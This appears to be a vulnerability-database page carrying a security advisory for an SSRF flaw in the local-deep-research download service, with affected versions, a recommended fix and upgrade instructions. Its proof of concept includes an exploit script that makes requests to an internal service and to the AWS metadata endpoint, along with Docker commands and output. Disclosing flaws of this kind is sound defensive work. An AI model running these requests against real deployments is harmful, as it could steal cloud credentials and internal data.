VDB
EN
MEDIUM 6.3

PYSEC-2026-1581

Local Deep Research is Vulnerable to Server-Side Request Forgery (SSRF) in Download Service

상세

## Summary

The download service (`download_service.py`) makes HTTP requests using raw `requests.get()` without utilizing the application's SSRF protection (`safe_requests.py`). This can allow attackers to access internal services and attempt to reach cloud provider metadata endpoints (AWS/GCP/Azure), as well as perform internal network reconnaissance, by submitting malicious URLs through the API, depending on the deployment and surrounding controls.

**CWE**: CWE-918 (Server-Side Request Forgery)

---

## Details

### Vulnerable Code Location

**File**: `src/local_deep_research/research_library/services/download_service.py`

The application has proper SSRF protection implemented in `security/safe_requests.py` and `security/ssrf_validator.py`, which blocks: - Loopback addresses (127.0.0.0/8) - Private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) - AWS metadata endpoint (169.254.169.254) - Link-local addresses

However, `download_service.py` bypasses this protection by using raw `requests.get()` directly:

```python # Line 1038 - _download_generic method response = requests.get(url, headers=headers, timeout=30)

# Line 1075 response = requests.get(api_url, timeout=10)

# Line 1100 pdf_response = requests.get(pdf_url, headers=headers, timeout=30)

# Line 1144 response = requests.get(europe_url, headers=headers, timeout=30)

# Line 1187 api_response = requests.get(elink_url, params=params, timeout=10)

# Line 1207 summary_response = requests.get(esummary_url, ...)

# Line 1236 response = requests.get(europe_url, headers=headers, timeout=30)

# Line 1276 response = requests.get(url, headers=headers, timeout=10)

# Line 1298 response = requests.get(europe_url, headers=headers, timeout=30) ```

### Attack Vector

1. Attacker submits a malicious URL via `POST /api/resources/<research_id>` 2. URL is stored in database without SSRF validation (`resource_service.py:add_resource()`) 3. Download is triggered via `/library/api/download/<resource_id>` 4. `download_service.py` fetches the URL using raw `requests.get()`, bypassing SSRF protection

---

## PoC

### Prerequisites

- Docker and Docker Compose installed - Python 3.11+

### Step 1: Create the Mock Internal Service

**File: `internal_service.py`**

```python #!/usr/bin/env python3 """Mock internal service that simulates a sensitive internal endpoint."""

from http.server import HTTPServer, BaseHTTPRequestHandler import json

class InternalServiceHandler(BaseHTTPRequestHandler): def log_message(self, format, *args): print(f"[INTERNAL SERVICE] {args[0]}") def do_GET(self): print(f"\n{'='*60}") print(f"[!] SSRF DETECTED - Internal service accessed!") print(f"[!] Path: {self.path}") print(f"{'='*60}\n") self.send_response(200) self.send_header("Content-Type", "application/json") self.end_headers() secret_data = { "status": "SSRF_SUCCESSFUL", "message": "You have accessed internal service via SSRF!", "internal_secrets": { "database_password": "super_secret_db_pass_123", "api_key": "sk-internal-api-key-xxxxx", "admin_token": "admin_bearer_token_yyyyy" } } self.wfile.write(json.dumps(secret_data, indent=2).encode())

if __name__ == "__main__": print("[*] Starting mock internal service on port 8080") server = HTTPServer(("0.0.0.0", 8080), InternalServiceHandler) server.serve_forever() ```

### Step 2: Create the Exploit Script

**File: `exploit.py`**

```python #!/usr/bin/env python3 """SSRF Vulnerability Active PoC"""

import sys import requests

sys.path.insert(0, '/app/src')

def main(): print("=" * 70) print("SSRF Vulnerability PoC - Active Exploitation") print("=" * 70) internal_url = "http://ssrf-internal-service:8080/secret-data" aws_metadata_url = "http://169.254.169.254/latest/meta-data/" headers = {"User-Agent": "Mozilla/5.0"} # EXPLOIT 1: Access internal service print("\n[EXPLOIT 1] Accessing internal service via SSRF") print(f" Target: {internal_url}") try: # Same pattern as download_service.py line 1038 response = requests.get(internal_url, headers=headers, timeout=30) print(f" [!] SSRF SUCCESSFUL! Status: {response.status_code}") print(f" [!] Retrieved secrets:") for line in response.text.split('\n')[:15]: print(f" {line}") except Exception as e: print(f" [-] Failed: {e}") return 1 # EXPLOIT 2: AWS metadata bypass print("\n[EXPLOIT 2] AWS Metadata endpoint bypass") from local_deep_research.security.ssrf_validator import validate_url print(f" SSRF validator: {'ALLOWED' if validate_url(aws_metadata_url) else 'BLOCKED'}") print(f" But download_service.py BYPASSES the validator!") try: requests.get(aws_metadata_url, timeout=5) except requests.exceptions.ConnectionError: print(f" Request sent without SSRF validation!") print("\n" + "=" * 70) print("SSRF VULNERABILITY CONFIRMED") print("=" * 70) return 0

if __name__ == "__main__": sys.exit(main()) ```

### Step 3: Run the PoC

```bash # Build and run with Docker docker network create ssrf-poc-net docker run -d --name ssrf-internal-service --network ssrf-poc-net python:3.11-slim sh -c "pip install -q && python internal_service.py" docker run --rm --network ssrf-poc-net -v ./src:/app/src ssrf-vulnerable-app python exploit.py ```

### Expected Output

``` ====================================================================== SSRF Vulnerability PoC - Active Exploitation ======================================================================

[EXPLOIT 1] Accessing internal service via SSRF Target: http://ssrf-internal-service:8080/secret-data [!] SSRF SUCCESSFUL! Status: 200 [!] Retrieved secrets: { "status": "SSRF_SUCCESSFUL", "message": "You have accessed internal service via SSRF!", "internal_secrets": { "database_password": "super_secret_db_pass_123", "api_key": "sk-internal-api-key-xxxxx", "admin_token": "admin_bearer_token_yyyyy" } }

[EXPLOIT 2] AWS Metadata endpoint bypass SSRF validator: BLOCKED But download_service.py BYPASSES the validator! Request sent without SSRF validation!

====================================================================== SSRF VULNERABILITY CONFIRMED ====================================================================== ```

---

## Impact

### Who is affected?

All users running local-deep-research in: - **Cloud environments** (AWS, GCP, Azure) - attackers can steal cloud credentials via metadata endpoints - **Corporate networks** - attackers can access internal services and databases - **Any deployment** - attackers can scan internal networks

### What can an attacker do?

| Attack | Impact | |--------|--------| | Access cloud metadata | Potentially access IAM credentials, API keys, or instance identity in certain cloud configurations | | Internal service access | Read sensitive data from databases, Redis, admin panels | | Network reconnaissance | Map internal network topology and services | | Bypass firewalls | Access services not exposed to the internet |

---

## Recommended Fix

Replace all `requests.get()` calls in `download_service.py` with `safe_get()` from `security/safe_requests.py`:

```diff # download_service.py

+ from ...security.safe_requests import safe_get

def _download_generic(self, url, ...): - response = requests.get(url, headers=headers, timeout=30) + response = safe_get(url, headers=headers, timeout=30) ```

The `safe_get()` function already validates URLs against SSRF attacks before making requests.

### Files to update: - `src/local_deep_research/research_library/services/download_service.py` (9 occurrences) - `src/local_deep_research/research_library/downloaders/base.py` (uses `requests.Session`)

---

## References

- [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html) - [OWASP SSRF Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html) - [AWS SSRF Attacks and IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html) - [PortSwigger: SSRF](https://portswigger.net/web-security/ssrf)

---

Thank you for your work on this project! I'm happy to provide any additional information or help with testing the fix.

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

PyPI / local-deep-research
최초 영향 버전: 1.3.0 수정 버전: 1.3.9
수정 pip install --upgrade 'local-deep-research>=1.3.9'

참고